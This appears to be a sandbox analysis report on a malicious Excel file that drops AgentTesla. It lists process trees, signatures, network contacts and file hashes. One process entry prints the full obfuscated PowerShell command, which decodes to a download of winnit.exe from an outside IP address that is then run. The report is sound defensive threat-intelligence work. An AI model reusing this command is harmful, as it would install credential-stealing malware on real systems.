Malware Analysis Report

2024-12-07 14:10

Sample ID 241112-hea2dawlgw
Target DRAFT BL & MBL PO NO ECM1D2403-29.xls
SHA256 0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40
Tags
agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0980c818b185071ebf00005388e6d09283692a33cdd5a28005b76c0018960f40

Threat Level: Known bad

The file DRAFT BL & MBL PO NO ECM1D2403-29.xls was found to be: Known bad.

Malicious Activity Summary

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx

AgentTesla

Process spawned unexpected child process

Agenttesla family

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

AutoIT Executable

Suspicious use of SetThreadContext

UPX packed file

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy WMI provider

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 06:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 06:38

Reported

2024-11-12 06:41

Platform

win7-20240903-en

Max time kernel

140s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 496 set thread context of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2800 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2800 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2800 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2800 wrote to memory of 2608 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2608 wrote to memory of 844 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 844 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 844 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 844 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2428 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2608 wrote to memory of 2428 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2608 wrote to memory of 2428 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2608 wrote to memory of 2428 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2428 wrote to memory of 2020 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2428 wrote to memory of 2020 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2428 wrote to memory of 2020 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2428 wrote to memory of 2020 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2608 wrote to memory of 496 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2608 wrote to memory of 496 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2608 wrote to memory of 496 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2608 wrote to memory of 496 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 496 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'JFA4OFdJYWNrc1AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYmVSREVGaU5JVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVFhndHZ0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElCcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5Tix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hhaExkWVRmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG94Y1NTY0FSKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaHBBY3JBVXAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlZalRCc0pMcmx6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQODhXSWFja3NQOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MC93aW5uaXQuZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBcnQtc0xlRVAoMyk7U3RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHdpbm5pdC5leGUi'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-uxvkgn0.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF70.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF6F.tmp"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 192.3.176.141:80 192.3.176.141 tcp
KR 221.146.204.133:443 4t.gg tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

memory/2384-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2384-1-0x000000007223D000-0x0000000072248000-memory.dmp

memory/2800-16-0x0000000002730000-0x0000000002732000-memory.dmp

memory/2384-17-0x0000000003070000-0x0000000003072000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 9d3841d618ec3b8e965084c7d5756dba
SHA1 64e58a9fcaea0c87bd9e2f959b0fb42f0737615e
SHA256 a26872ec2bd5b9a439bbdd2edd834216538f4139850a5bce5b2c3a6ab47bda12
SHA512 bbb824f160a0a0b76a2e3e32d989fb7bf867e5814716c4219b4c012d67dbaf6b487123b584faf26245b7967ecd90ff9801f0688eeb6299a83e3b4226f7128031

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 81132b36583c8271c57dea829ba9e703
SHA1 733155c25e7d1d2de1fd3ccc344687f8e3acf405
SHA256 c53f813e6a53f3e5579a06f2ada1c6829797a20e83b7702d6988de6dd3c19a0e
SHA512 03eaecf39525bbc457de040b82767addf8492ce69642a7a3861d167db441105db5905bfddfa8d61adfd4e00518ed70e929cd1f9fd4ff2c07242694c307c992a4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 58c534b3002effb43019949c9e5dbb6f
SHA1 e8a7f39d1cd084872b9b5db4454c0c888408a0f9
SHA256 4fc48ed22e464d082039573a2fc8a44129ce11a72b7c397136482e4488a1ee2c
SHA512 4e03e09710bb4005d3cacaabb78b70b8c48016336b65ec3f1bc5e2726d48f388acbd1a787cf413f724d355e747d2db1a14d3b512bd20f887252cbea470d876ae

C:\Users\Admin\AppData\Local\Temp\CabC745.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\creatingnextleeverthingswithentireprocessgetitinonlineback[1].hta

MD5 e69934eff6238d7a043cf35938fd4ad3
SHA1 de69f4785657104ad260b25c6e09231f566991f1
SHA256 46af3b6280d8707438e4c2f4c8134ddafe46a4c59799b84e55645b384b4aa208
SHA512 c821bd8f363f22f941093588a9f7772a479d930daf190124be13a7f493fe73debb1c535990d9cb5c3982234e3572202a42c95087ea90e0681cc32509e79e722b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 997f1131efac13d28da12bdb0fc2c812
SHA1 a56eaf579a869d87d0dc38286b1485a89fc4647c
SHA256 ef0393f8e70f1f0bc85fa4ede361bbc2cb877282e35407f33b28856087e8c8fc
SHA512 2fccdba72ccba40b057627cbeefcb688c1cf7b97dbbd360a0e6d4f2e1f5f8138120b143d21517e0bdc605550ed12f0ea6516fa7ac54569946d606ae6104b5273

\??\c:\Users\Admin\AppData\Local\Temp\-uxvkgn0.cmdline

MD5 acaf1e5cb7d0ffb09b36d92b9dffd1d8
SHA1 123d4f7f19e16cb7b25e6274b70e8f2c86ce1d8b
SHA256 47cefb853761a36500e30dd109d3b8067dd831fb18b38353a866ccaa50ca1c6c
SHA512 9f9c2d7ed32697ecc8407e0286c0f6f639131ece21a6ead57d815a471dd0aad5c72e9335ac738be31663e96068d99b284e0790f5bb05355271251cbb8ec674e8

\??\c:\Users\Admin\AppData\Local\Temp\-uxvkgn0.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

\??\c:\Users\Admin\AppData\Local\Temp\CSCCF6F.tmp

MD5 fa0ad5eea115ea27401de52140ef599b
SHA1 221a9067a15bb84798f92c30d64235906d5f096d
SHA256 fee485cb7af5b799261b59e8e5dfc6939b57fb8bb1c2800da126f08d5efc6cd6
SHA512 24eb28aeeda30bee0dd58f352ff711c229692170f4ba18b7612c353296e0cb227ab58898298142ee23a38e71e5d8e88c72dc86e20c0a5ba6faecea9b4957ff4f

C:\Users\Admin\AppData\Local\Temp\RESCF70.tmp

MD5 4981dffbc8e39a20df10db3c548f25eb
SHA1 7c6b9a10f0add19eded0e1de724874b831a2abf6
SHA256 73568086024c4395c46ad1f3765e9e5e3c775d7cbc2cd730dc74edcbef123a52
SHA512 ee93d9b16b13d9ac92e99eb7e0b09c3eed0b5463b900ed3769fd606ecfde718f3b44488706f2d85dce8dd7e0b4af9d0694ddc984c4b3de4812700230318f5d6a

C:\Users\Admin\AppData\Local\Temp\-uxvkgn0.dll

MD5 bb25bbf54b2c88e192908b53a55405f7
SHA1 c5d25725f1199705ff5c7aedb8c4830fc773fb10
SHA256 428a5fde6c551ae5bcb106d384d85030310b6b7bb871888c483c6022e4e4561a
SHA512 8f58ebeb79f21bd40118f36eec4339772a5af093caf284038fc77b8858e087896c2c411156336ba0080d818b2c97a72a62f396faf3fee7b3025273a57751a9d2

C:\Users\Admin\AppData\Local\Temp\-uxvkgn0.pdb

MD5 4b9d901fb81da015d135ebfb67106a0b
SHA1 8de2ccf1ba04d13e3bc9a5732e293ba4b72c0db7
SHA256 3d7c85a68d29f1d68b32c8bb51201b4d6c11bac1a411db799a93cf946bef6527
SHA512 e6a1d0e8869d1c60d7a44cf3752c959b6481c731b12dd83dd3d093337a11a40363e5e8d788863cd5ab763a5f4790be585bdd66e16ed78731d6931b6720081ffb

memory/2384-60-0x000000007223D000-0x0000000072248000-memory.dmp

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b

memory/2608-65-0x00000000067B0000-0x00000000069BD000-memory.dmp

memory/2900-69-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2900-70-0x0000000000400000-0x0000000000446000-memory.dmp

memory/496-72-0x0000000000D90000-0x0000000000F9D000-memory.dmp

memory/2900-73-0x0000000000960000-0x00000000009B4000-memory.dmp

memory/2900-74-0x0000000002020000-0x0000000002072000-memory.dmp

memory/2900-98-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-108-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-106-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-132-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-128-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-124-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-122-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-120-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-118-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-116-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-114-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-110-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-104-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-102-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-100-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-96-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-94-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-92-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-90-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-86-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-84-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-82-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-80-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-130-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-78-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-126-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-76-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-112-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-75-0x0000000002020000-0x000000000206D000-memory.dmp

memory/2900-88-0x0000000002020000-0x000000000206D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 06:38

Reported

2024-11-12 06:41

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

140s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 768 wrote to memory of 3940 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 768 wrote to memory of 3940 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\DRAFT BL & MBL PO NO ECM1D2403-29.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 192.3.176.141:80 192.3.176.141 tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 141.176.3.192.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/768-0-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-1-0x00007FFB2874D000-0x00007FFB2874E000-memory.dmp

memory/768-2-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

memory/768-3-0x00007FFAE8730000-0x00007FFAE8740000-memory.dmp

